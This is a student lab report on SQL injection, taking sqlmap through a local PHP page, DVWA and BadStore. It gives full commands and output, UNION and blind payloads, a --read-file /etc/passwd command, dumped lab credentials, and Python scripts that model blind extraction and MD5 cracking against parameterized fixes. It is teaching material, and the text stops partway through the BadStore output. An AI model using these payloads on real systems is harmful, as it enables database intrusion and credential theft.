SQL Injection with SQLMap
Contents

1. Local attack
   A) DB server and version
   B) DB name
   C) Tables
   D) Columns
   E) Table contents
   F) Other databases
   G) MySQL users
2. DVWA
   Installation
3. BadStore
   A) DB server and version
   B) DB name
   C) Tables
   D) Columns
   E) Other DBs
4. Acunetix
   A) DB server and version
   B) DB name
   C) Tables
   D) Columns
Iván Martín Valderas
Página 2
SQL Injection
1. Local attack

We are going to run a SQL injection attack against the page from the previous exercise, the one that queried our MySQL database. Its location is: http://localhost/ejerPHP/SQL_Injection/consulta.php. For this we use the SQLMap program from the command line.

A) DB server and version
First we find out the type of database server and its version. For this we use sqlmap's -b (banner) option:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 -b

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 13:57:25

[13:57:26] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[13:57:26] [INFO] testing connection to the target url
[13:57:26] [INFO] testing if the url is stable, wait a few seconds
[13:57:27] [INFO] url is stable
[13:57:27] [INFO] testing if GET parameter 'id' is dynamic
[13:57:27] [INFO] confirming that GET parameter 'id' is dynamic
[13:57:27] [INFO] GET parameter 'id' is dynamic
[13:57:28] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[13:57:28] [INFO] testing sql injection on GET parameter 'id'
[13:57:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:57:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:57:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:57:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[13:57:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:57:38] [INFO] target url appears to be UNION injectable with 3 columns
[13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] Y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[13:57:44] [INFO] the back-end DBMS is MySQL
[13:57:44] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
banner: '5.5.8'
[13:57:44] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 13:57:44

In this step the program tried each of its test families in turn to work out the server type:

[...]
'MySQL > 5.0.11
'PostgreSQL > 8.1
'Microsoft SQL Server
[...]

Once the tests finished it settled on MySQL. Note that the output carries two version figures: "back-end DBMS: MySQL 5.0.11" is sqlmap's fingerprint, a lower bound derived from the time-based test (the SLEEP() function it relies on exists from 5.0.12 on, hence the test title "MySQL > 5.0.11"), whereas the banner requested with -b, '5.5.8', is the version string the server itself reports and is the one to record. The three injection types found (boolean-based blind, UNION with 3 columns, time-based blind) are saved in the session file and reused by every command that follows, which is why those runs report "a total of 0 HTTP(s) requests" for detection.
B) DB name

This is the first step in pulling out everything we can from our victim, since from here on we go step by step deeper into the DB. We get the name of the database the query we ran refers to, i.e. the current database, with the --current-db option:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --current-db

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:01:02

[14:01:02] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:01:02] [INFO] resuming injection data from session file
[14:01:02] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:01:02] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:01:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:01:03] [INFO] fetching current database
current database: 'asir1'
[14:01:03] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:01:03

The name of the database is "asir1".
C) Tables

Once we have the database name we can list the tables it holds, with the --tables option and -D asir1 for the name obtained before:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --tables -D asir1

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:04:48

[14:04:48] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:04:48] [INFO] resuming injection data from session file
[14:04:48] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:04:48] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:04:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:04:49] [INFO] fetching tables for database 'asir1'
[14:04:49] [INFO] the SQL query used returns 1 entries
Database: asir1
[1 table]
+----------+
| usuarios |
+----------+

[14:04:49] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:04:49

We get one table: usuarios
D) Columns

With the table name known, --columns together with -T usuarios -D asir1 lists its columns and their types:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --columns -T usuarios -D asir1

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:06:30

[14:06:30] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:06:30] [INFO] resuming injection data from session file
[14:06:30] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:06:30] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:06:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:06:31] [INFO] fetching columns for table 'usuarios' on database 'asir1'
[14:06:31] [INFO] the SQL query used returns 3 entries
Database: asir1
Table: usuarios
[3 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| id       | int(10) unsigned |
| nonmbre  | varchar(50)      |
| password | varchar(50)      |
+----------+------------------+

[14:06:31] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:06:31

We have obtained the column names and their types (the second column really is called nonmbre; that is how the schema spells it).
E) Table contents

Finally, --dump with the same -T and -D retrieves every row of the table:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --dump -T usuarios -D asir1

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:07:28

[14:07:28] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:07:28] [INFO] resuming injection data from session file
[14:07:28] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:07:28] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:07:28] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:07:29] [INFO] fetching columns for table 'usuarios' on database 'asir1'
[14:07:29] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\localhost\session': id, int(10) unsigned, nonmbre, varchar(50), password, varchar(50)
[14:07:29] [INFO] fetching entries for table 'usuarios' on database 'asir1'
[14:07:29] [INFO] the SQL query used returns 3 entries
Database: asir1
Table: usuarios
[3 entries]
+----+---------+----------+
| id | nonmbre | password |
+----+---------+----------+
| 2  | ivan    | ivanasir |
| 3  | luci    | luciasir |
| 1  | root    | asir2012 |
+----+---------+----------+

We now have the complete usuarios table of the asir1 database. Note that the passwords are stored in clear: the dump hands over working credentials with no cracking step. Storing a salted password hash would not have prevented the injection, but it would have left the attacker with hashes to crack rather than passwords ready to use.
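The following script is added here as an illustration; it is not part of the original report and not sqlmap's code. It reproduces in miniature what sqlmap did in steps A to E against consulta.php: it builds a throwaway SQLite copy of the asir1.usuarios table from the three rows dumped above (the column name nonmbre is kept exactly as the page shows it), models the page's string-built query, decodes the CHAR() markers from the UNION payload sqlmap reported, recovers root's password through the boolean-based blind oracle one bit per request, dumps the whole table through the UNION, and shows the same inputs failing against a version that validates and binds the parameter. The query shape of consulta.php and the SQLite stand-in for MySQL are assumptions; the MySQL equivalents are noted in the comments.

```python
import re
import sqlite3

# Constructed copy of the rows sqlmap dumped from asir1.usuarios.
# 'nonmbre' is the real column name on the page (a typo in the schema), kept as-is.
ROWS = [(1, "root", "asir2012"), (2, "ivan", "ivanasir"), (3, "luci", "luciasir")]

# The UNION payload sqlmap reported for GET parameter 'id' (copied from the page).
SQLMAP_UNION_PAYLOAD = (
    "-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),"
    "IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),"
    "CHAR(58,108,107,98,58)), NULL, NULL#"
)


def make_db():
    """In-memory SQLite stand-in for the MySQL database (assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE usuarios (id INTEGER, nonmbre TEXT, password TEXT)")
    con.executemany("INSERT INTO usuarios VALUES (?, ?, ?)", ROWS)
    return con


def consulta_vulnerable(con, user_id):
    """Assumed shape of consulta.php: the id is concatenated straight into the SQL."""
    sql = "SELECT id, nonmbre, password FROM usuarios WHERE id=" + user_id
    return con.execute(sql).fetchall()


def consulta_segura(con, user_id):
    """Hardened lookup: validate the type, then bind the value (a mysqli prepared
    statement in PHP); the input can no longer change the structure of the query."""
    try:
        uid = int(user_id)
    except ValueError:
        return []
    return con.execute(
        "SELECT id, nonmbre, password FROM usuarios WHERE id=?", (uid,)
    ).fetchall()


def decode_char_calls(payload):
    """Turn every CHAR(n,n,...) in a sqlmap payload into the text it builds.
    sqlmap uses CHAR() so that the payload needs no quote characters at all."""
    return [
        "".join(chr(int(n)) for n in group.split(","))
        for group in re.findall(r"CHAR\(([\d,]+)\)", payload)
    ]


def oracle(con, payload):
    """Boolean oracle, as with 'id=1 AND 6656=6656': True when the page still
    renders a row, i.e. the injected condition held."""
    return len(consulta_vulnerable(con, payload)) > 0


def blind_extract(con, expr, max_len=32):
    """Boolean-based blind extraction: recover the string produced by the SQL
    expression `expr` one bit per request.  MySQL form of the inner expression:
    ASCII(SUBSTRING((expr),pos,1)) & bit."""
    out = ""
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(7, -1, -1):
            payload = f"1 AND (unicode(substr(({expr}),{pos},1)) & {1 << bit}) > 0"
            if oracle(con, payload):
                code |= 1 << bit
        if code == 0:  # past the end of the string: substr() is empty
            break
        out += chr(code)
    return out


def union_dump(con):
    """UNION technique: a negative id makes the real SELECT match nothing, so the
    page renders the rows of the SELECT we append (3 columns, as sqlmap found)."""
    payload = "-8382 UNION ALL SELECT id, nonmbre, password FROM usuarios"
    return consulta_vulnerable(con, payload)


def run_demo():
    con = make_db()
    return {
        "markers": decode_char_calls(SQLMAP_UNION_PAYLOAD),
        "root_password": blind_extract(
            con, "SELECT password FROM usuarios WHERE nonmbre='root'"
        ),
        "dump": sorted(union_dump(con)),
        "safe_with_payload": consulta_segura(con, "1 AND 6656=6656"),
        "safe_with_id": consulta_segura(con, "1"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The decoded markers show what the UNION payload above actually does: it makes the page print ":jrk:GYDMSVtKlt:lkb:", a random token wrapped in delimiters, and sqlmap only has to look for that token in the response to know the UNION worked. The blind routine is the slow path sqlmap falls back to when no UNION is available: eight requests per character, which is why the time-based variant with SLEEP(5) takes so long on a real target.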
F) Other databases

The --dbs option lists every database the application's account can see, not just the current one:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --dbs

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:08:22

[14:08:22] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:08:22] [INFO] resuming injection data from session file
[14:08:22] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:08:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:08:22] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:08:22] [INFO] fetching database names
[14:08:22] [INFO] the SQL query used returns 8 entries
available databases [8]:
[*] asir1
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

Besides asir1, the listing includes MySQL's own schemas (mysql, information_schema, performance_schema) and the phpmyadmin database: the account the page uses is not confined to its own database.
G) MySQL users

The --users option enumerates the accounts defined in the database server:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --users

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:10:03

[14:10:03] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:10:03] [INFO] resuming injection data from session file
[14:10:03] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:10:03] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:10:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:10:03] [INFO] fetching database users
[14:10:03] [INFO] the SQL query used returns 58 entries
database management system users [4]:
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
Apart from the anonymous ''@'localhost' account and the phpMyAdmin account 'pma', the only user is root, present as 'root'@'localhost' and 'root'@'127.0.0.1'. Here lies one of the problems: the PHP page connects to MySQL with the default root user that MySQL ships with. If the application's SQL statements run as root, they run with every privilege, including FILE, so the injection can reach the server's file system (sqlmap does this through MySQL's LOAD_FILE()). That is how we could retrieve the system's account file, for example on UNIX:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --read-file /etc/passwd

Two caveats. First, the --users listing only shows that the application's database account can read the user catalogue; whether it really is root (and a DBA) should be confirmed with --current-user and --is-dba before relying on it. Second, /etc/passwd holds account names, not passwords: the hashes live in /etc/shadow, which only root can read at the operating-system level, and LOAD_FILE() reads files with the permissions of the mysqld process, so even a DBA can only fetch what that process can open (newer MySQL releases additionally restrict it through secure_file_priv). This particular target runs on Windows, as sqlmap reported, so the UNIX path is given only as an example.
2. DVWA

Damn Vulnerable Web App (the folder must be placed in htdocs).

Installation
Default username = admin
Default password = password

To access it, type the following in the browser: http://127.0.0.1/dvwa/

We create the database from DVWA's setup page.
We check that the vulnerability exists by entering the following in the User ID field of the SQL Injection page:

1' or '1'='1' union select password, first_name from users where first_name='admin

The first quote closes the string the application built around the id, or '1'='1' makes the WHERE clause always true, and the union appends a row of our own in which the password column lands where the page expects a first name. The page answers:

ID: 1' or '1'='1' union select password, first_name from users where first_name='admin
First name: 5f4dcc3b5aa765d61d8327deb882cf99
Surname: admin

Reference: http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA
We have obtained a password, but as we can see it is not in clear: it is a 32-hex-character MD5 hash (5f4dcc3b5aa765d61d8327deb882cf99 is the MD5 of "password", DVWA's default). A hash cannot be decoded; the web utilities that "decode" it simply look it up in tables of precomputed hashes of common passwords, which is why weak passwords come back instantly and strong ones do not.

Let's pull out all the passwords at once, since with the previous payload we would have to do it one user at a time:

1' or '1'='1' union select first_name, password from users where '1'='1

The where '1'='1 clause is always true, so the union row is produced for every user and the page lists each first name next to its hash.
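Added here as an illustration (it is not part of the original report nor DVWA's own code): a SQLite model of the DVWA users table with the query shape of the low-security SQL Injection page (assumed: SELECT first_name, last_name FROM users WHERE user_id = '<id>'), run against both payloads from this section, followed by the dictionary check that identifies the 32-hex-character value as the MD5 of "password". The second user row and the word list are constructed for the example.

```python
import hashlib
import sqlite3

# Constructed rows in the shape of DVWA's users table.  The admin hash is the
# value the page recovered; the second row is made up for this example.
USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", hashlib.md5(b"abc123").hexdigest()),
]

# The two payloads typed into the User ID field on the page.
PAYLOAD_ADMIN = (
    "1' or '1'='1' union select password, first_name "
    "from users where first_name='admin"
)
PAYLOAD_ALL = "1' or '1'='1' union select first_name, password from users where '1'='1"

# Constructed word list; a real run uses a large list such as rockyou.txt.
WORDLIST = ["123456", "letmein", "password", "admin"]


def make_db():
    """In-memory SQLite stand-in for DVWA's MySQL database (assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
        "user TEXT, password TEXT)"
    )
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", USERS)
    return con


def dvwa_lookup_vulnerable(con, user_id):
    """Assumed shape of the DVWA low-security query: the id sits inside single
    quotes, so a quote in the input ends the string and the rest is parsed as SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def dvwa_lookup_safe(con, user_id):
    """Same lookup with a bound parameter: the quote stays inside the value."""
    return con.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def crack_md5(digest, wordlist):
    """A hash is not an encoding: it cannot be reversed, only matched against
    guesses.  Returns the word whose MD5 equals `digest`, or None."""
    digest = digest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def run_demo():
    con = make_db()
    one = dvwa_lookup_vulnerable(con, PAYLOAD_ADMIN)
    everyone = dvwa_lookup_vulnerable(con, PAYLOAD_ALL)
    # The union rows carry a hash where the page expects a surname, so they are
    # the rows whose second column is 32 hex characters long.
    leaked = [row for row in everyone if len(row[1]) == 32]
    return {
        "admin_row": [row for row in one if row[1] == "admin" and len(row[0]) == 32],
        "all_hashes": sorted(leaked),
        "safe": dvwa_lookup_safe(con, PAYLOAD_ADMIN),
        "cracked": {digest: crack_md5(digest, WORDLIST) for _, digest in leaked},
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Both payloads also return the legitimate (first_name, last_name) rows because of the or '1'='1' tautology; only the union rows carry a hash. The second hash (of "abc123") is not in the constructed word list and stays uncracked, which is the normal outcome for anything not in the dictionary.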
3. BadStore

If we type a double quote (") in the search field we get back a response from the SQL server (an error message), from which we can anticipate a SQL injection vulnerability.

As with the first exercise, we follow the same steps.

A) DB server and version
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:02:41

[10:02:41] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:02:41] [INFO] testing connection to the target url
[10:02:41] [INFO] testing if the url is stable, wait a few seconds
[10:02:42] [INFO] url is stable
[10:02:42] [INFO] testing if GET parameter 'searchquery' is dynamic
[10:02:43] [WARNING] GET parameter 'searchquery' is not dynamic
[10:02:43] [INFO] heuristic test shows that GET parameter 'searchquery' might be injectable (possible DBMS: MySQL)
[10:02:43] [INFO] testing sql injection on GET parameter 'searchquery'
[10:02:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:02:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[10:02:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:02:57] [INFO] target url appears to be UNION injectable with 4 columns
[10:02:57] [INFO] GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'searchquery' is vulnerable. Do you want to keep testing the others? [y/N] y

Here it has told us that the 'searchquery' parameter is vulnerable, i.e. the search box in which we typed the double quote earlier is sent as a GET parameter into which we can inject SQL statements; it also asks whether we want to look for other vulnerable parameters.

[10:03:05] [INFO] testing if GET parameter 'action' is dynamic
[10:03:05] [INFO] confirming that GET parameter 'action' is dynamic
[10:03:05] [INFO] GET parameter 'action' is dynamic
[10:03:05] [WARNING] heuristic test shows that GET parameter 'action' might not be injectable
[10:03:05] [INFO] testing sql injection on GET parameter 'action'
[10:03:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:17] [WARNING] GET parameter 'action' is not injectable
[10:03:17] [INFO] testing if GET parameter 'x' is dynamic
[10:03:17] [WARNING] GET parameter 'x' is not dynamic
[10:03:17] [WARNING] heuristic test shows that GET parameter 'x' might not be injectable
[10:03:17] [INFO] testing sql injection on GET parameter 'x'
[10:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:31] [WARNING] GET parameter 'x' is not injectable
[10:03:31] [INFO] testing if GET parameter 'y' is dynamic
[10:03:31] [WARNING] GET parameter 'y' is not dynamic
[10:03:31] [WARNING] heuristic test shows that GET parameter 'y' might not be injectable
[10:03:31] [INFO] testing sql injection on GET parameter 'y'
[10:03:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:44] [WARNING] GET parameter 'y' is not injectable
sqlmap identified the following injection points with a total of 380 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---
[10:03:45] [INFO] testing MySQL
[10:03:45] [INFO] confirming MySQL
[10:03:45] [INFO] the back-end DBMS is MySQL
[10:03:45] [INFO] fetching banner
web application technology: Apache 1.3.28
back-end DBMS: MySQL < 5.0.0
banner: '4.1.7-standard'
[10:03:45] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:03:45

Only one injection point was found this time, a UNION query with 4 columns on 'searchquery'; the other three parameters are not injectable. The banner is the version string the server reports: 4.1.7-standard, i.e. a MySQL 4 server. That matters for the following steps, because MySQL 4 has no information_schema and sqlmap cannot simply query the catalogue for table and column names.
B) DB name

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --current-db

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:12:35

[10:12:35] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:12:35] [INFO] resuming injection data from session file
[10:12:35] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:12:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
